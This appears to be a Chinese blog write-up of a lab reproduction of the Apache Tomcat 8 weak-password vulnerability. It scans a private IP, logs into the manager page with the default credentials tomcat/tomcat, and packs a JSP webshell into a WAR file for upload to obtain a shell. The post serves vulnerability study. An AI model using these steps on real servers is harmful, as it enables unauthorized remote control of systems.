apache-tomcat_8_weak-password

Apache-Tomcat_8_weak-password

说明内容
漏洞编号
漏洞名称Apache-Tomcat8 弱口令
漏洞评级高危
影响范围Apache-Tomcat 7+
漏洞描述存在默认口令
修复方案

漏洞描述

正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了某些属性,才可以进行攻击。

漏洞等级

高危

影响版本

  • apache-tomcat 7+

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
apache-tomcat8

漏洞扫描

使用nacs可以扫描到漏洞

sudo ./nacs -h 192.168.117.163 -pa 80

在这里插入图片描述

漏洞验证

启动环境,访问主页,使用默认账号密码登录

tomcat
tomcat

在这里插入图片描述

在这里插入图片描述

深度利用

GetShell

可以将木马做成war包进行上传

在这里插入图片描述

  1. 进入java目录

    cd tools/java/jdk1.8.0_65/bin
    
  2. 将jshell.jsp复制过来

    cp /home/kali/tools/webshell/jsp/jshell.jsp ./
    
  3. 用jar命令进行压缩

    ./jar cvf jshell.war jshell.jsp
    

    在这里插入图片描述

  4. 上传war包,会生成路径

    在这里插入图片描述

  5. 访问路径即完成getshell

漏洞挖掘

网络测绘

tomcat 8

修复建议

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值